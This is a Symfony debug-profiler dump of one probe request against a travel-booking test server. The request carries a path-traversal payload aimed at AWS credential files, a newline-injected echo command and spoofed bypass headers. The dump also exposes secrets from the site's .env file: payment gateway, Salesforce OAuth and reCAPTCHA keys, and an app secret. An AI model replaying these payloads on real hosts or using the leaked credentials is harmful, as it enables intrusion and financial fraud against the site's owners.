n/a
Request
GET Parameters
| Key | Value |
|---|---|
| file_name | "../../../../../../~/.aws/credentials" |
| module | "logging" |
| number_of_lines | """ 10000\n echo TEST_RCE_2025 """ |
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _remove_csp_headers | true |
Request Headers
| Header | Value |
|---|---|
| accept | "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" |
| accept-encoding | "gzip, deflate, br, zstd" |
| accept-language | "en-US,en;q=0.9" |
| cache-control | "max-age=0" |
| cf-connecting-ip | "160.130.10.189" |
| content-length | "" |
| content-type | "" |
| cookie | "PHPSESSID=53ee070eefe332ead4286258f10c4510" |
| forwarded | "for=160.130.10.189;proto=http" |
| forwarded-for | "160.130.10.189" |
| host | "testing-reservations.amatera-voyages.com" |
| sec-ch-ua | ""Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"" |
| sec-ch-ua-mobile | "?0" |
| sec-ch-ua-platform | ""macOS"" |
| sec-fetch-dest | "document" |
| sec-fetch-mode | "navigate" |
| sec-fetch-site | "none" |
| sec-fetch-user | "?1" |
| upgrade-insecure-requests | "1" |
| user-agent | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" |
| x-api-key | "SAgcvcFkNqalRx1h3Gm0dht7FXNf0ZbD" |
| x-api-version | "1.0" |
| x-azure-clientip | "160.130.10.189" |
| x-azure-socketip | "160.130.10.189" |
| x-client-ip | "160.130.10.189" |
| x-correlation-id | "2bLavEB0UL7YSSpIpdy7CAZDl7c4n6XK" |
| x-forwarded | "160.130.10.189" |
| x-forwarded-for | "160.130.10.189" |
| x-google-real-ip | "160.130.10.189" |
| x-nextjs-data | "1" |
| x-originating-ip | "160.130.10.189" |
| x-php-ob-level | "1" |
| x-real-ip | "160.130.10.189" |
| x-remote-addr | "160.130.10.189" |
| x-remote-ip | "160.130.10.189" |
| x-request-id | "cHxrYw1sGhJWTOEn2eCMnvhnzoubcJsR" |
| x-requested-with | "XMLHttpRequest" |
| x-vercel-id | "xcnch6i00z8ckn4u" |
| x-vercel-ip-country | "DE" |
| x-vercel-protection-bypass | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Wed, 07 Jan 2026 09:02:44 GMT" |
| x-debug-exception | "No%20route%20found%20for%20%22GET%20%2Fpms%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fmaisonsduvoyage%2Fwww%2Ftesting-reservations.amatera-voyages.com%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:136" |
| x-debug-token | "982af1" |
| x-debug-token-link | "https://testing-reservations.amatera-voyages.com/_profiler/c8b5d4" |
| x-previous-debug-token | "c8b5d4" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
| Key | Value |
|---|---|
| PHPSESSID | "53ee070eefe332ead4286258f10c4510" |
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "1c981e4b0ba03d960d3bb127b8c2464a" |
| FROM_EMAIL | "juan@tuxe.es" |
| GOOGLE_ANALYTICS_UA | "UA-650586-59" |
| GOOGLE_RECAPTCHA_SECRET | "6LfQr6kZAAAAAP9VaFGSP8rQv17vj00McpOWnGYA" |
| GOOGLE_RECAPTCHA_SITE_KEY | "6LfQr6kZAAAAABmIvUFGmOvb9d8KMmD7oWVu86BA" |
| GOOGLE_TAG_MANAGER_CONTAINER | "GTM-P2XH228" |
| HIPAY_HOSTEDPAGEV2 | "true" |
| HIPAY_PASSWORD | "Test_DhrBQXy9rO59KpH98rOh738Q" |
| HIPAY_SECRET_HASH_ALG | "SHA256" |
| HIPAY_SECRET_PASSPHRASE | "3{dzXKk={@%?rFFr0,wZcG8}%]xVsofatae{2ruJ" |
| HIPAY_USERNAME | "94693755.stage-secure-gateway.hipay-tpp.com" |
| IP_ADDRESS_AGENCE | "193.58.247.21;193.58.247.50" |
| MAILER_DSN | "smtp://tuxe.es:1025" |
| MAINTENANCE_ENABLED | "1" |
| MAINTENANCE_END_HOUR | "04" |
| MAINTENANCE_END_MINUTE | "00" |
| MAINTENANCE_START_HOUR | "00" |
| MAINTENANCE_START_MINUTE | "00" |
| TRUSTED_PROXIES | "127.0.0.1,REMOTE_ADDR" |
| USE_CAPTCHA | "0" |
| USE_VAGRANT | "0" |
| WEBSERVICE_AUTH_PASSWORD | "Lmdv2020*" |
| WEBSERVICE_AUTH_URL | "https://test.salesforce.com/services/oauth2/token" |
| WEBSERVICE_AUTH_USERNAME | "integrationnature@lmdv.com.partial" |
| WEBSERVICE_CLIENT_ID | "3MVG90J3nJBMnqrQ8mTBMlC89gzSnkP.Cb3GZOxxsUnuRlpdp7WqhhRT7Px6Vg.TFGIi7GPdu4tF3B.ZqtJdp" |
| WEBSERVICE_CLIENT_SECRET | "9E2D690C9FC4F836ADCC725A6346C93CA114900A989DA8275AF98D9F47538ED1" |
| WEBSERVICE_FAKE_DATA | "0" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "" |
| CONTENT_TYPE | "" |
| DOCUMENT_ROOT | "/var/www/maisonsduvoyage/www/testing-reservations.amatera-voyages.com/public" |
| DOCUMENT_URI | "/index.php/pms" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www/maisonsduvoyage" |
| HTTPS | "on" |
| HTTP_ACCEPT | "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" |
| HTTP_ACCEPT_ENCODING | "gzip, deflate, br, zstd" |
| HTTP_ACCEPT_LANGUAGE | "en-US,en;q=0.9" |
| HTTP_CACHE_CONTROL | "max-age=0" |
| HTTP_CF_CONNECTING_IP | "160.130.10.189" |
| HTTP_COOKIE | "PHPSESSID=53ee070eefe332ead4286258f10c4510" |
| HTTP_FORWARDED | "for=160.130.10.189;proto=http" |
| HTTP_FORWARDED_FOR | "160.130.10.189" |
| HTTP_HOST | "testing-reservations.amatera-voyages.com" |
| HTTP_SEC_CH_UA | ""Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"" |
| HTTP_SEC_CH_UA_MOBILE | "?0" |
| HTTP_SEC_CH_UA_PLATFORM | ""macOS"" |
| HTTP_SEC_FETCH_DEST | "document" |
| HTTP_SEC_FETCH_MODE | "navigate" |
| HTTP_SEC_FETCH_SITE | "none" |
| HTTP_SEC_FETCH_USER | "?1" |
| HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" |
| HTTP_X_API_KEY | "SAgcvcFkNqalRx1h3Gm0dht7FXNf0ZbD" |
| HTTP_X_API_VERSION | "1.0" |
| HTTP_X_AZURE_CLIENTIP | "160.130.10.189" |
| HTTP_X_AZURE_SOCKETIP | "160.130.10.189" |
| HTTP_X_CLIENT_IP | "160.130.10.189" |
| HTTP_X_CORRELATION_ID | "2bLavEB0UL7YSSpIpdy7CAZDl7c4n6XK" |
| HTTP_X_FORWARDED | "160.130.10.189" |
| HTTP_X_FORWARDED_FOR | "160.130.10.189" |
| HTTP_X_GOOGLE_REAL_IP | "160.130.10.189" |
| HTTP_X_NEXTJS_DATA | "1" |
| HTTP_X_ORIGINATING_IP | "160.130.10.189" |
| HTTP_X_REAL_IP | "160.130.10.189" |
| HTTP_X_REMOTE_ADDR | "160.130.10.189" |
| HTTP_X_REMOTE_IP | "160.130.10.189" |
| HTTP_X_REQUESTED_WITH | "XMLHttpRequest" |
| HTTP_X_REQUEST_ID | "cHxrYw1sGhJWTOEn2eCMnvhnzoubcJsR" |
| HTTP_X_VERCEL_ID | "xcnch6i00z8ckn4u" |
| HTTP_X_VERCEL_IP_COUNTRY | "DE" |
| HTTP_X_VERCEL_PROTECTION_BYPASS | "1" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000%0aecho%20TEST_RCE_2025" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "45.156.87.138" |
| REMOTE_PORT | "46032" |
| REQUEST_METHOD | "GET" |
| REQUEST_TIME | 1767776564 |
| REQUEST_TIME_FLOAT | 1767776564.6016 |
| REQUEST_URI | "/pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000%0aecho%20TEST_RCE_2025" |
| SCRIPT_FILENAME | "/var/www/maisonsduvoyage/www/testing-reservations.amatera-voyages.com/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "141.94.68.65" |
| SERVER_NAME | "testing-reservations.amatera-voyages.com" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/2.0" |
| SERVER_SOFTWARE | "nginx/1.18.0" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,USE_VAGRANT,WEBSERVICE_AUTH_URL,WEBSERVICE_AUTH_USERNAME,WEBSERVICE_AUTH_PASSWORD,WEBSERVICE_CLIENT_ID,WEBSERVICE_CLIENT_SECRET,WEBSERVICE_FAKE_DATA,GOOGLE_RECAPTCHA_SITE_KEY,GOOGLE_RECAPTCHA_SECRET,USE_CAPTCHA,GOOGLE_ANALYTICS_UA,GOOGLE_TAG_MANAGER_CONTAINER,IP_ADDRESS_AGENCE,HIPAY_USERNAME,HIPAY_PASSWORD,HIPAY_SECRET_PASSPHRASE,HIPAY_SECRET_HASH_ALG,FROM_EMAIL,TRUSTED_PROXIES,HIPAY_HOSTEDPAGEV2,MAILER_DSN,MAINTENANCE_ENABLED,MAINTENANCE_START_HOUR,MAINTENANCE_START_MINUTE,MAINTENANCE_END_HOUR,MAINTENANCE_END_MINUTE" |
| USER | "maisonsduvoyage" |